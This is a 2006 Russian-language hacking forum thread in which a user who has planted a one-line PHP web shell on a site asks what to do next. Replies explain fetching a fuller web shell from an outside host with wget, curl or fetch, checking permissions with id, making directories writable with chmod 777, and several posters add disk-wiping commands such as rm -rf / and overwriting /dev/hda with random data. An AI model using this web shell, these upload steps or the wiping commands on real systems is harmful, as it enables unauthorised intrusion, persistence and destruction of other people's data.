Подскажите комманды linux

Discussion in 'Безопасность и Анонимность' started by TweakeR, 7 Mar 2006.

  1. TweakeR

    TweakeR Member

    Joined:
    6 Feb 2006
    Messages:
    54
    Likes Received:
    8
    Reputations:
    5
    Сделал себя админом, залил шелл:
    PHP:
    <?  system(\$_GET['c']);  ?>
    _http://сайт.ру/cmd.php?c=какие_тут_команды_и_для_чего?
    Можно ли туда нормальный шелл залить, чтоб файлы редактировать??
     
    #1 TweakeR, 7 Mar 2006
    Last edited: 8 Mar 2006
  2. TweakeR

    TweakeR Member

    Joined:
    6 Feb 2006
    Messages:
    54
    Likes Received:
    8
    Reputations:
    5
    Может чё не так сделал??
     
  3. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Функция System не навсех сервах включена, чаще всего используется passthru
     
    #3 Mobile, 8 Mar 2006
    Last edited: 8 Mar 2006
  4. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    А вообще ты объяснил неочень, имхо подробней надо...
     
  5. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Попробуй

    ls la wget вообщем почитай про команды Linux FreeBSd или чо там стоит на том сервере и сможеш сделать всё что тебе надо на ачате гдетто лежит статья про команды так что юзай поиск !
     
    _________________________
  6. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    да можно... используй что-то типо wget http://lol.ru/remview.txt -O xxx.php

    но если тебе удобнее rst то его. Если wget отключена пользуй fetch или curl
     
  7. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Это кстате тоже далеко невсегда срабатыает...
     
  8. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Естестственно, все зависит от конкретного случая.
     
  9. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
  10. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
  11. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    все команды довольно подробно расписанны в мануаласх пичитай все поймешь..
    тебе понадобятся для работы с файлами и навигации cd,cp,mv,rm,mkdir и др.
    конкретно для заливки шела например rst нужно узнать какая на серве стоит качаллка командой which петем перебора тех что тебе перечислили выше например cmd.php?c=which wget
    если получиш ответ севере типо /usr/bin/wget значит она установленна. узнай какие у тебя права командой id потом найли открытый на запись каталог и зазей туда если нет открытых кактогов но есть каталоги владелец UID владельца которого совпадает с твоим который ты узнал по команде ID то просто открой каталог на запись командой chmod (к примеру chmod 777 dorectory ).и лей туда свой шел,,,

    помоему дала исчерпывающий мануал.
     
    2 people like this.
  12. grinay

    grinay IQ- 137%

    Joined:
    15 Jun 2004
    Messages:
    409
    Likes Received:
    174
    Reputations:
    305
    Мда одна фраза меня убила зделал себя админом:)
    и можно ли редактировать файлы?:)
    конечно нельзя редактировать файлы ведь ты же админ да? :)
    а вообще кез там все показал но я не много уточню.Про курл он не написал:)
    curl http://shell.txt -o shell.txt
     
  13. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    юзай команды:
    ls -al - список файлов в дире
    cd ../ - подняться на диру выше
    which wget;which curl - узнать есть ли wget или curl
    wget http://www.xxx.ru/shell.php - залить shell
    uname -a - версия оси

    и тд.
     
  14. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
  15. rent0n

    rent0n Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    119
    Likes Received:
    19
    Reputations:
    2
    man тебе поможет во всем
     
  16. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    вот ещё пару прикольных команд:
    rm -rf / :) :) :)
    а это вообще убойная штука - cat /dev/urandom > /dev/hda :) :) :)
     
    _________________________
    1 person likes this.
  17. Kalashmat

    Kalashmat Member

    Joined:
    28 Mar 2006
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    Как правило на серверах скази диски так что скорее всего /dev/sda
     
  18. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ну рулит супер мега комманда
    cd /;rm -rf *;wall root you suck!
    ;)

    2rent0n, расслабься, иногда чисто из спортивного интереса можно делать да и если те не надо система а хочешь проучить?
     
    #18 m0nzt3r, 30 Mar 2006
    Last edited: 30 Mar 2006
  19. rent0n

    rent0n Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    119
    Likes Received:
    19
    Reputations:
    2
    Это супер мега долбо**ская команда, ибо кроме бездумного долбо**ского бахвальства и выпендрежа ничего не приносит
     
  20. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Гдето я это видел =)